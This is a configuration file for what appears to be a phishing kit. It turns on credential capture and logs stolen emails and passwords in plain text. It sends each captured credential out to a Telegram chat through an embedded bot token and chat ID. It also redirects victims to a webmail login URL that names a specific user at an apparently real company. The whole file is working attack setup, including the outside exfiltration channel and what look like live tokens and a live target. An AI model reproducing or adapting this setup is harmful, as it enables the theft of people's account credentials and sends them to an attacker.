# Credential Capture Configuration
# This file stores captured credentials in plain text

CAPTURE_ENABLED=true
LOG_FILE=credentials.txt
REDIRECT_URL=https://login.serverdata.net/user/Account/Login?ReturnUrl=%2Fuser%2Fwsfed%3Fwa%3Dwsignin1.0%26wtrealm%3Dhttps%253a%252f%252feast-2fa.exch082.serverdata.net%252fowa%252f%26wctx%3Drm%253d0%2526id%253dpassive%2526ru%253d%25252fowa%25252f%25253flogin_hint%25253dedecastro%252540courthousegardens.com%26wct%3D2026-02-02T08%253a31%253a16Z

# Telegram Webhook Configuration
TELEGRAM_BOT_TOKEN=8133407038:AAFslD-_Gow0X4A268V2rgrmCjkDzDu_kG0
TELEGRAM_CHAT_ID=7844108983

# Captured credentials will be:
# 1. Stored in credentials.txt in the format: [TIMESTAMP] Email: user@example.com | Password: plaintext_password
# 2. Sent to Telegram chat via bot webhook
